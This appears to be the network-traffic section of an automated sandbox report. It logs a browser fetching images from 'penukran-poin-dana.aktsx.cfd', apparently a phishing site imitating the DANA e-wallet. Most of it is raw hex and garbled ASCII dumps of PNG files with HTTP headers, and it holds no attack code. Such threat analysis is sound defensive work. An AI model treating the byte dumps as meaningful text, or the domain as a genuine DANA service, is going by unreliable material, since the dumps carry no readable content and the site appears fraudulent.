                                                                                                                            Oct 6, 2024 13:50:06.910845041 CEST1236INData Raw: 1e 93 95 51 4a c5 31 02 d6 1a 61 f4 73 62 5e bc 08 90 6c d6 6a c0 71 2c 51 4a c9 e1 c3 87 13 b1 f1 30 cb 40 63 cd d9 ce ce 4e eb f7 5b 2c 16 13 f1 fc 01 a0 b9 d9 6e ad 94 8a 15 c4 69 c0 55 84 da 8f 4d 0d 38 2d 22 8d e8 03 8e a7 d3 6b 19 11 99 cb
                                                                                                                            Data Ascii: QJ1asb^ljq,QJ0@cN[,niUM8-"kja"kW=}t$iOjAp*eW)`LQd2IhZ(jMfV$)`hc%bLXBbN.-J[a'$bnDIl:,,%E
                                                                                                                            Oct 6, 2024 13:50:06.910864115 CEST1236INData Raw: ea b0 4b 12 0a f2 34 32 53 53 53 02 27 84 23 23 b2 52 94 40 7c 34 60 92 29 00 cf 00 f0 61 44 63 7a 06 80 87 fb fb fb 63 55 7c 63 39 a1 06 ec 70 34 3c ae 12 96 23 4a a2 aa 84 55 77 f3 13 c9 34 80 67 01 b8 1f 40 57 44 cd fe 18 c0 48 44 6d 5d 36 4e
                                                                                                                            Data Ascii: K42SSS'##R@|4`)aDczcU|c9p4<#JUw4g@WDHDm]6Nl6p|v8bA,jL\~/IZ9iQW8zQ:M6=}WMp$(#Q>4m^SF<p&h3iHVRJiF $[<}>
                                                                                                                            Oct 6, 2024 13:50:06.910878897 CEST1236INData Raw: 04 af 25 2a 3e af b8 43 12 e9 74 3a e2 13 54 1b 06 ee df bf bf de 7d 58 11 cd cd cd 91 4c 00 a7 01 5f 9a 32 80 8f 01 b8 33 9b cd 9e 70 c2 d7 e1 58 ff 38 0d b8 f6 14 8b 45 ee db b7 2f 11 3b 9b 42 a1 60 75 02 9c 09 c2 72 1a f0 45 59 00 70 f7 f4 f4
                                                                                                                            Data Ascii: %*>Ct:T}XL_23pX8E/;B`urEYp;W J$%2LbHq9||"Zcp8%V5`|a4A/"$iHNRbnZ[eDd?iJp48I2AF)'CHk"6
                                                                                                                            Oct 6, 2024 13:50:06.910893917 CEST272INData Raw: c8 c8 08 7a 7b 7b d7 74 37 2b f9 8c 0b 5c 53 d9 00 b0 ea ab f2 73 c4 6d 22 27 15 92 32 34 34 94 6a 6f 6f 57 3b 77 ee c4 c8 c8 88 00 a8 3c 0f 02 c0 f0 f0 f0 99 eb 97 57 b7 ea ed ed c5 c8 c8 c8 39 ff ef ed ed e5 fe fd fb fd db 6f bf 3d 49 fe 3f 00
                                                                                                                            Data Ascii: z{{t7+\Ssm"'244jooW;w<W9o=I?Ux=C\XXXT0@*sse~O"w+^.F+I544 TJz{{5BWq}:)$SvK=a@"6p8p8


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.649720165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:05.726835012 CEST405OUTGET /asset/img/bi.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:06.621356964 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 16542
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 68 00 00 00 c8 08 06 00 00 00 c5 8e 7b 8f 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 79 98 24 55 95 b7 df 13 99 b5 f6 de 74 b3 36 b2 36 3b 0a b4 cb 80 0a e2 82 88 88 c0 27 a8 e3 86 0b 38 2a 2e 28 e2 8a 36 33 32 22 6e e8 88 83 3a 2a ee 08 b8 cc e0 07 8a 62 a3 a8 0c 7e a0 80 ec cd d2 d0 74 d3 f4 de d5 4b 55 56 65 dc df f7 c7 8d e8 cc ca ce ca 8c cc ca da ef fb 3c f5 f4 52 11 37 4e dc b8 71 e2 dc 73 cf 39 17 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 00 80 8d b5 00 81 40 56 24 b5 03 5d c9 4f 3b d0 96 fc e4 80 88 d2 78 16 e0 80 18 18 48 7e 0a 40 1f d0 6b 66 fd a3 2b 79 20 d0 1c 41 41 07 c6 1d 92 0c af 74 f7 02 8e 04 0e 07 0e 03 76 06 66 00 d3 81 6e a0 03 e8 94 94 37 b3 48 52 ce cc 84 57 cc 0e 28 52 a6 98 81 cd 40 0f b0 0a b8 07 f8 47 5f 5f [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDRh{sRGBsBIT|d IDATxy$Ut66;'8*.(632"n:*b~tKUVe<R7Nqs9@ @ @ @ @ @ @ @ @V$]O;xH~@kf+y AAtvfn7HRW(R@G__Gf#I_w-Tt9VSn9wN5kf$@`L00fH^<8UR`6:S>o-[v>7*U$*1/3p-1Qt`T4x>pWl /1+0oG`B#)\x&sE137"&3Es$[1&x>*7lL&0bs=ln.1<Id}qL}[Y7l$6:Q$HUXMX{^dcjl@**vQ@~|X2"M$*~4O>zZxs7Iz:.IBUF~V$VIyOAt);Z3f*ilYo. J>027psn?I_4#p$%7J|\HP6K*V`#>BRw'r'vI]fv(#6
                                                                                                                            Oct 6, 2024 13:50:06.621431112 CEST1236INData Raw: 98 d9 53 23 78 9d 40 20 30 95 90 64 7d 7d 7d fb 49 fa 5b 32 6d 1f 0b fa 25 5d 21 9f 32 de cc 3d cc 96 f4 3d 49 03 6a bd 5b 26 2b 45 49 bf 97 b4 a0 d5 cf 28 10 08 4c 51 24 1d 25 bf 18 38 56 ca 39 a5 20 e9 3d 6a 70 d1 4d 52 bb a4 2f 39 e7 fa c7 56
                                                                                                                            Data Ascii: S#x@ 0d}}}I[2m%]!2==Ij[&+EI(LQ$%8V9 =jpMR/9V|I^IV!#AaY<(F=<[1X]LL@\_/;<0`<"Lp_^rj<KjsOD7%2'!.vafZ9
                                                                                                                            Oct 6, 2024 13:50:06.621495008 CEST1236INData Raw: 78 16 70 14 e3 3c 83 74 9c 58 d0 11 5e 29 66 65 a4 c3 15 0d 1f 13 1d b6 c8 9a 42 04 05 3d 75 e8 00 4e 35 b3 99 63 2d 48 3d c6 89 05 2d 7c aa 7a 56 76 1e 29 41 ca d8 09 38 5d d2 a4 2c ef 1a d8 91 a0 a0 a7 0e bb 00 13 22 12 60 9c 58 d0 2e 8e e3 f5
                                                                                                                            Data Ascii: xp<tX^)feB=uN5c-H=-|zVv)A8],"`X.YLf'e)BPS/v#xIax(]+0=Xti|3<Q=67}2zimL1Mxaq>rde,n~|.|UQK"h]/
                                                                                                                            Oct 6, 2024 13:50:06.621527910 CEST672INData Raw: 68 e3 89 8a 54 ef cc ca 4f 12 40 2f b0 5c d2 df 81 1b 80 2b 81 3b 87 38 a5 1d 38 1a b8 0e f8 97 75 eb d6 65 aa 4c 67 66 1b 81 cb 81 b3 80 db 94 5c 78 2c 88 a2 68 80 3a a5 51 03 13 97 60 41 4f 52 76 d9 65 97 98 0c 5b 36 8d 47 ea 24 aa 08 58 01 dc
                                                                                                                            Data Ascii: hTO@/\+;88ueLgf\x,h:Q`AORve[6G$XlpmI3{X}>_=/^:w$}61] 3*fqIHPFpIT):~E(J]G}&3nesm'jfIz~2[_%,IKPDMUz
                                                                                                                            Oct 6, 2024 13:50:06.621561050 CEST1236INData Raw: bf 33 73 e6 cc d9 0a 2c 65 64 5c 4c 2b 80 c7 46 a0 dd c0 38 22 28 e8 c9 cf 66 33 fb c7 58 0b d1 08 e3 d4 82 06 38 fa 8c 33 ce c8 5c 1e 21 49 c1 7e 92 91 a9 89 72 07 be 72 5f 60 12 13 14 f4 e4 67 0b f0 d7 b1 2c 89 d9 28 e3 d4 82 06 d8 1d bf 53 7a
                                                                                                                            Data Ascii: 3s,ed\L+F8"(f3X83\!I~rr_`g,(Sz#I+e3@w%+n4xN/G\nI+Zch(cxxd<AAO71A9N]o_1/$L${RZe;7bl 09zp
                                                                                                                            Oct 6, 2024 13:50:06.621592999 CEST1236INData Raw: b3 86 3a 48 52 ce cc 16 a8 01 7f f0 38 c1 80 68 60 60 a0 1d e8 6c 6b 6b 9b 1e c7 f1 6c 60 17 e7 dc c2 28 8a 0e 02 0e 07 e6 e1 df 8f 88 11 74 05 4a 22 59 0c fc 08 7e d1 32 10 d8 ce a4 9c 96 06 86 87 7c 58 dc 27 80 f3 80 a1 16 d3 06 f0 b5 89 33 d7
                                                                                                                            Data Ascii: :HR8h``lkkl`(tJ"Y~2|X'3G':t36C/WB)@%AA"isQt`G\ER]AAD>?0d:[;EDEPg].t3kUpw})/g<$p(}_N;3/*
                                                                                                                            Oct 6, 2024 13:50:06.621625900 CEST1236INData Raw: 45 11 40 2f b0 1a bf 03 c5 43 c0 56 33 2b b4 42 a8 0d 1b 36 cc 9c 33 67 ce 7f 02 ff 09 dc d2 6c 3b c5 62 f1 24 60 e7 5c 2e f7 c3 66 77 c5 90 64 ce b9 73 a3 28 ca e3 6b 0c 0f 24 7f 82 2f d7 9a c7 6f d5 e4 80 6f 9a d9 36 49 51 1c c7 27 e7 72 b9 fd
                                                                                                                            Data Ascii: E@/CV3+B63gl;b$`\.fwds(k$/oo6IQ'rsqED~lfYfyFS~~[rfvS3s.b"kZ3J?VSsG=WzxFI9Nj9MkI'"umX|<?ln)^
                                                                                                                            Oct 6, 2024 13:50:06.621658087 CEST1236INData Raw: bf 28 1b 53 1b 25 bd b2 ce 39 b3 25 5d a7 c1 2c 93 74 bb a4 3f 4a fa 9d 73 6e 89 a4 bf c8 7f 2c 1f 96 b4 3a 19 5f e5 38 49 9b 24 fd 57 5f 5f df be 4d c8 7d 88 bc 62 4b c7 5c 4a 9f a4 e5 89 3c 57 27 7d fd 25 f9 77 e8 66 49 0f 25 d7 2d 3f c7 49 da
                                                                                                                            Data Ascii: (S%9%],t?Jsn,:_8I$W__M}bK\J<W'}%wfI%-?I%\$LY/V|HzK?VUIz$P~VX^OAC|$uBY?iIt(J\,O!.koS_3$][~&?nu*t;*I6qM#B:0
                                                                                                                            Oct 6, 2024 13:50:06.621690035 CEST1236INData Raw: 33 61 87 66 26 33 7b 18 6f f0 2c a1 74 ef 1d 51 14 9d bd db 6e bb fd 53 35 ab b8 ca bd 46 c0 cb 80 4b 24 cd 6a 54 0e 4a 61 68 24 32 d4 fd e2 15 8b c5 34 aa ab 21 3a 3b 3b d7 02 57 cc 98 31 63 6b 95 5f cf 61 f0 47 e6 56 ea 7f 2c 0a c0 a3 d4 56 b8
                                                                                                                            Data Ascii: 3af&3{o,tQnS5FK$jTJah$24!:;;W1ck_aGV,V!vq!IvG4M=o9tS=*m4\o3gV}Ix03|j(B%+]C5I+=mM|>BW6Ua1&3>O4/
                                                                                                                            Oct 6, 2024 13:50:06.621737957 CEST1236INData Raw: 6f 19 ec a2 3b 10 ef 67 04 ff b2 3d 9f d2 fb 23 e7 dc f5 89 15 dd 52 cc 4c ce b9 9b 18 6c ec 3c 83 d2 c7 61 a8 f3 62 e0 27 c0 d7 24 f5 e1 95 c8 41 78 25 dd 74 76 6e ab 91 8f 61 3f 7f a8 8f b7 99 6d 88 e3 f8 5a 4a f7 1f 01 c7 01 97 4b 5a d8 e4 42
                                                                                                                            Data Ascii: o;g=#RLl<ab'$Ax%tvna?mZJKZBx@6ii8>f..tX|4c;;2[6\s5[c("ZS"=|:pzp<on;/&*3;QskiT^(
                                                                                                                            Oct 6, 2024 13:50:06.626689911 CEST1236INData Raw: 14 56 1c c7 c3 f5 41 1b fe 45 4c 29 92 58 d4 03 03 03 95 d3 f1 8e 42 a1 d0 b2 f2 af d5 a8 92 28 b3 85 b2 8f 42 bd 7b 4d de a3 df e3 c3 ed d6 26 ff 3d 37 97 cb 7d 06 78 41 2d 83 67 18 fd 78 6f 72 bd 8b 2a 7e 2e 06 be 02 fc 1a bf 19 84 91 21 b6 19
                                                                                                                            Data Ascii: VAEL)XB(B{M&=7}xA-gxor*~.!FQbz|(nd>LrHav'YN<L9oB2DbIE\QHHHiJn$_/ejVW^,ZG*j._nR|TA\Wkv9


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.649723165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:05.727150917 CEST406OUTGET /asset/img/kom.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:06.640691042 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 8484
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 94 25 75 75 ef bf bb ce e9 ee e9 79 0f c3 0c 6f e4 29 32 0a 0c 90 0b 78 81 18 41 34 e2 03 44 63 f0 c9 12 8d 88 57 4d 94 45 ae 17 91 c7 8d 9a 64 2d f5 e6 1a 0d 6a 6e 1e be a2 4c 04 d4 28 48 40 c6 84 a0 04 26 f2 90 19 90 01 5a 18 98 07 c3 34 dd 3d fd 3e 55 fb 7b ff a8 aa 9e 5f 57 57 9d 53 75 4e 9d 53 75 ba 7f 9f b5 66 cd e9 aa df 63 d7 af 7e bb 7e ef bd 01 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b 65 41 23 45 0b b0 10 98 98 98 38 a2 a7 a7 e7 35 95 4a e5 22 00 eb 01 ac 25 e9 88 48 bd f2 57 00 04 b0 0b c0 af 01 fc 0b 80 9f 88 c8 6f db 2f b1 c5 d2 26 48 9e a5 aa 0f 90 f4 d8 46 54 d5 23 79 3f c9 53 8b 7e 66 8b 25 11 92 2f 21 b9 91 a4 b6 53 21 52 a0 24 6f 1b 1b 1b 3b b8 e8 32 b1 [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDRXsRGBsBIT|d IDATx{%uuyo)2xA4DcWMEd-jnL(H@&Z4=>U{_WWSuNSufc~~bX,bX,bX,bX,bX,bX,bX,eA#E85J"%HWo/&HFT#y?S~f%/!S!R$o;2,p\BCI>@cx3.-LM/H&,/ZV!_<f#E-XIK-Kpl+Zc$V-Kp-HYqL`C9`QU}"cY"X@$DhJ)122ze-KY 9,"nmAH^l1Y`/-KXp-HhY]"rB^?YP-x9;88hYb(l5[Yjs)pvr#n-DBa'-G`3_xN;&&&tR~P8JUOve"xBG-G y|ydd`oW8LD}</N*Z )7,ZyCntrxY+<Zg-G(|lgu}ZVx$Vh;dtgk",%^OTj ){7a9]GrlI%)
                                                                                                                            Oct 6, 2024 13:50:06.640758038 CEST224INData Raw: 92 6f c9 e3 1d 96 95 79 31 48 57 d5 69 11 e9 29 5a 8e 14 0c 03 38 43 44 1e 6b 36 01 92 2b 54 f5 53 22 72 99 88 2c 43 09 de 21 c9 9a 88 9c 26 22 0f 16 2d 4b de 14 5e b8 ad a2 aa 5b 45 e4 98 a2 e5 68 c0 0b 00 8e 11 91 e1 66 22 4f 4e 4e 1e d7 d7 d7
                                                                                                                            Data Ascii: oy1HWi)Z8CDk6+TS"r,C!&"-K^[Ehf"ONNw3+w8vHEQ{||="BEWIr>4"hH3]}r$_pgMrA|AH_}bO_^ "
                                                                                                                            Oct 6, 2024 13:50:06.640786886 CEST1236INData Raw: b2 55 b0 54 90 7c 0d 80 3b 8a 96 c3 84 e4 2e c7 71 32 9d 69 27 b9 06 c0 73 00 ba 61 82 a1 19 d6 8b c8 43 45 0b d1 0a dd aa 20 8a f2 c8 4e 00 a7 8a c8 03 a9 23 90 87 00 f8 0d 80 25 6d 93 aa 1c a8 88 54 8a 16 a2 15 ba ae 29 27 79 0b ca a3 1c 4f 01
                                                                                                                            Data Ascii: UT|;.q2i'saCE N#%mT)'yOUUyxhR7V\PU_y1xM8a*InP?ZD&nDuq7-G3tK#"%"$/XzEVY.EfN);brq24C
                                                                                                                            Oct 6, 2024 13:50:06.640849113 CEST1236INData Raw: 32 76 f1 b6 2c 94 71 a6 64 34 8f 44 86 87 87 ff 20 7a cd f3 bc af a0 b8 ed 35 77 8a 48 8f 88 34 b4 b5 05 00 13 13 13 47 a8 ea 76 f8 d6 e4 bf 8a ee b1 f3 2b 22 72 6c 7f 7f ff 36 55 9d 20 79 6c 83 c0 83 9d 12 ac 19 4a a7 20 cd 78 84 8d c1 5d b9 72
                                                                                                                            Data Ascii: 2v,qd4D z5wH4Gv+"rl6U ylJ x]r|8By%-Zh@DjlmEDx7wFNA!D/,yQ@GK({ibu/bKienSDW/y7Tq%]#{w]BdWTI};\
                                                                                                                            Oct 6, 2024 13:50:06.640882969 CEST1236INData Raw: 9d 2d b1 f6 52 ab d5 ce ca f2 f0 a3 a3 a3 1d 9b b2 5e b0 90 1c 4c f1 2e 16 19 e1 a5 a9 aa bc 8f 7f 8b e4 3f d0 64 3a 9b 3b 5f 5a ed 87 e4 e7 52 3e 7f 43 c3 79 65 a5 2b ba 58 06 c7 a5 08 73 45 f8 43 44 c8 98 45 be 0c 44 f7 58 cd d9 a8 d8 08 92 9e
                                                                                                                            Data Ascii: -R^L.?d:;_ZR>Cye+XsECDEDXJ\N8mDDv "qe!"XFGGn!6KHW5+"I^344[`~A^W}t_jpmkfTu+||U\p;sUGk,6`2W
                                                                                                                            Oct 6, 2024 13:50:06.640914917 CEST1236INData Raw: 7c a9 5b ab 8d 1b 37 96 ce f6 af a5 e4 90 7c 47 4c 25 9b 22 79 b0 11 a6 5f 55 77 a5 ad 88 a4 df 05 22 b9 8d e4 ef 33 61 f6 2a 46 96 c3 e9 2b 4b bd 4a af 24 57 05 e1 ff 39 83 48 77 b6 ab 0c e7 3b 0b 7e 0b 42 50 81 7f 03 20 6a 9d e3 5e 00 67 07 bb
                                                                                                                            Data Ascii: |[7|GL%"y_Uw"3a*F+KJ$W9Hw;~BP j^gAT9}?;<Q9z]x;vX~{w8 cwZZ9_oU-xs)5w2F_[0qb^3Y$F=K}DWTu?b}PiqEUSm
                                                                                                                            Oct 6, 2024 13:50:06.640947104 CEST1236INData Raw: bb 85 fe a0 3a 0b c3 00 50 a9 54 46 13 ee cf 5c 67 93 5d cd a0 8c bf 15 fc 06 80 83 9a 49 07 00 44 24 34 88 27 00 b6 35 9b 4e 5a da e9 f9 74 3c fc 51 ad 56 a7 e3 02 90 1c 14 91 25 00 0e 12 91 5d 71 61 00 bf 35 02 10 b6 18 da db db 9b a9 79 8e e1
                                                                                                                            Data Ascii: :PTF\g]ID$4'5NZt<QV%]qa5y^ZDx3"cril?$dk!]MlDnZ@f=l0QZ\=hRO'dL6p?jU6F\m!#A'_7."F],68{H[I.N)$
                                                                                                                            Oct 6, 2024 13:50:06.640980959 CEST1087INData Raw: 69 34 81 27 46 ee 39 46 57 83 3b 77 ee 4c 7c c9 24 7b 39 9b 5c cc ff 47 d2 5c 17 73 5f 49 8e c4 c5 0d ee 8f 18 f1 d7 44 9e eb 99 3a f1 06 8c 78 b1 83 4b 55 9d 59 98 ac 93 ce 59 41 90 cf d4 7f d2 99 f0 17 47 9e f9 c9 e0 fa 3b 48 72 64 64 64 ff 84
                                                                                                                            Data Ascii: i4'F9FW;wL|${9\G\s_ID:xKUYYAG;HrdddxvE\4FtlmG`7];A,Zl||WH"R'Eihy:_Apq)lIeM1[+V|sOWp)0zW
                                                                                                                            Oct 6, 2024 13:50:06.654927969 CEST412OUTGET /asset/img/load_spin.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:06.978497028 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 5078
                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 04 00 00 00 07 51 66 15 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 06 82 fe 92 c0 00 00 12 aa 49 44 41 54 78 da ed 9d f9 7b 14 d7 95 86 df 5a 7a 51 ab b5 81 5a 3b 20 c9 80 43 8c 6d c6 78 89 6d 12 1b 18 2f f3 78 e6 c9 3f 3b 36 4e 66 1c c7 4e e2 cc 04 c6 76 12 b0 8d 6d 04 02 24 a1 0d 21 a9 5b ea 56 57 57 cd 0f 75 fb f6 ad d6 d6 6b 55 83 ee a7 07 d1 dd 52 dd 7b ce f9 74 ce b9 e7 2e 55 06 4f 01 bc bd 3e 34 b0 30 b1 88 11 27 8e 01 38 94 28 52 c0 a1 b4 df 25 9d 8f 0e 96 b1 ca a6 49 06 18 24 c3 71 fa e8 a5 87 14 5d 24 48 08 42 a0 c4 0e 45 b6 c9 b2 49 96 4d 36 e5 ff 1b 6c b0 4d e9 e9 50 bb e3 24 ab a2 21 c5 30 53 9c e5 17 4c 33 46 3f 49 2c c0 c5 a3 44 89 12 2e 8e 7c 55 c2 55 be 3b 94 70 d8 a1 40 8e 27 2c f1 90 47 2c [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDRQfgAMAa cHRMz&u0`:pQ<bKGDtIMEIDATx{ZzQZ; Cmxm/x?;6NfNvm$![VWWukUR{t.UO>40'8(R%I$q]$HBEIM6lMP$!0SL3F?I,D.|UU;p@',G,BA(TXgyLs0pI1^x8bep;!BE)^IN{p|bs0*N2m*p"$101(aV00`bfL[<\\ 0^`924YL@8&1Epq%lerE)H&I66>e;2L$*d:WB-a[se"%*$F.c12?<6g8)Hp\P*q,\,#?3Fp[ 0cd!:X,l4YW`M3knjxM>5`c6s|9i5>E['<3||ZEM7#<XXGPQ<u><)/byfLa_mC*+|y ?-!E-iyQRG*uKGe:-YJ1jf>N0I*/W6.U=\S[|-!Rc-.yG
                                                                                                                            Oct 6, 2024 13:50:06.978529930 CEST1236INData Raw: 65 a1 62 8a cb bc c7 a0 f4 0c 7f 24 95 e5 3a 9f 72 93 9d 76 ab d7 90 cc 60 33 cc 69 46 b1 03 15 8b cb 06 f7 78 e4 07 af 76 c9 dc 96 76 a5 62 93 fc 07 2f 12 0b 78 46 8e af f9 84 ef a3 1a e7 d7 2c bb c9 10 67 18 c2 0a e4 14 87 25 ee 91 6d 9f ec 6d
                                                                                                                            Data Ascii: eb$:rv`3iFxvvb/xF,g%mmhSmJqS,fH~A9^(UC!1\nEQl5EiWvh1.rmlxQ]+-!Wx1/xC$%Cb'YZ
                                                                                                                            Oct 6, 2024 13:50:06.978543997 CEST448INData Raw: 49 0a 06 0c 4a ac 47 2d de d1 83 42 88 98 70 af d4 e7 5b 7a 23 5c f8 a8 f6 90 b8 dc 2a ea b1 a9 37 33 84 8f 6a 42 12 32 60 39 e5 fb 0b 6a 84 09 49 88 08 58 95 84 be 45 51 fb 47 f8 08 7a 88 1a b0 b2 8d 6d 85 d4 68 0e 41 42 2a 09 7d 47 4f b8 47 03
                                                                                                                            Data Ascii: IJG-Bp[z#\*73jB2`9jIXEQGzmhAB*}GOGAO~DC`G*!UBp-:G9;5<TBp(*OliF(b)XS)rr5!Q!B LH%~F{Q~o%,o h1N
                                                                                                                            Oct 6, 2024 13:50:06.978657961 CEST1236INData Raw: cf 57 23 02 94 3d a4 9c 45 0c e5 2c 95 46 04 28 27 f5 4a d0 aa e3 09 eb 1a ad 47 b9 30 ac 1c d3 89 e9 a1 6f 94 28 1b bf 72 90 cd c2 d2 69 3d 3a 98 62 b6 c4 91 1c 98 3a 68 45 89 b2 87 e8 b4 de 21 28 13 e2 2a 59 24 ae 8b c3 e8 b0 d7 e9 5b 9d d6 23
                                                                                                                            Data Ascii: W#=E,F('JG0o(ri=:b:hE!(*Y$[#^-l"e1/jm%h%uB<~w$P!YhzZh ;j&$!UA[FTGRW#Qz$/CK>W#D(iu5>=S=|uF


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.649739165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:06.437655926 CEST304OUTGET /asset/img/dana_logo.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:07.657351971 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 12786
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
